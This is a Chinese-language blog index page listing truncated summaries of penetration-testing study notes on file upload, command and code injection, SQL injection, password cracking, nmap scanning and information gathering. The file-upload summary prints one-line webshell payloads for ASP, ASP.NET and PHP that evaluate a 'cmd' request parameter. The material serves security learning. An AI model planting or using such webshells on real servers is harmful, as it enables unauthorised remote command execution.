摘要:
文件上传 1、一句话木马 ASP: <%eval request("cmd")%> ASP.NET: <%@ Page Language="Jscript"%> <%eval(request.Item["cmd"],"unsafe");%> PHP: <?php @eval($_REQUES 阅读全文
posted @ 2020-11-11 10:16
xs123456789
阅读(384)
评论(0)
推荐(0)
摘要:
命令注入 1、漏洞的危害 1、继承Web 服务器程序权限(Web 用户权限)读写文件、执行系统命令2、反弹Shell(服务器主动连接攻击方)3、控制整个服务器 2、相关命令 1、system()函数 system() 能够将字符串作为OS 命令执行,自带输出功能,需要等待命令执行完成后才会返回结果并 阅读全文
posted @ 2020-11-11 10:13
xs123456789
阅读(340)
评论(0)
推荐(0)
摘要:
代码注入 1、RCE 代码执行(注入)类似SQL 注入漏洞,SQLi 是将SQL 语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个Web 后门的存在。 1、程序中含有可以执行PHP 代码的函数或者语言结构 2、传入第一点中 阅读全文
posted @ 2020-11-11 10:11
xs123456789
阅读(288)
评论(0)
推荐(0)
摘要:
SQL注入 1、原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将 阅读全文
posted @ 2020-11-11 10:07
xs123456789
阅读(774)
评论(0)
推荐(0)
摘要:
口令破解 明文传输 HTTP、FTP、Telnet等传输的数据流都是明文,包括口令认证信息 破解方式:在线破解、离线破解 在线破解:账号密码 需要认证 用户名已知,用户名未知 密码未知 用户名未知,密码已知 离线破解:密文还原 明文 1、暴力破解 密码生成工具 crunch (kali自带) cru 阅读全文
posted @ 2020-11-11 09:47
xs123456789
阅读(1488)
评论(0)
推荐(0)
摘要:
关于扫描 1、资产发现 资产整理,发现,收集 联网设备、主机、服务器、各种服务等 主机发现 有哪些主机在线,IP地址 端口扫描 确定在线主机开启端口 端口上使用的服务 开启的端口、端口上的服务 2、nmap 用处:可以跨网段扫描 参数 -sP/-sn 不进行端口扫描 -p 指定端口 -p 80 -p 阅读全文
posted @ 2020-11-11 09:42
xs123456789
阅读(409)
评论(0)
推荐(0)
摘要:
1、收集内容 DNS信息:域名注册商、管理员联系方式、电话、邮箱、子域名 1、whois kali工具 2、whois.chinaz.com 站长之家 子域名查询 1、searchdns.netcraft.com 2、证书 判断对方操作系统 windows还是linux,是否大小写 搜索引擎 goo 阅读全文
posted @ 2020-11-11 09:38
xs123456789
阅读(731)
评论(0)
推荐(0)

浙公网安备 33010602011771号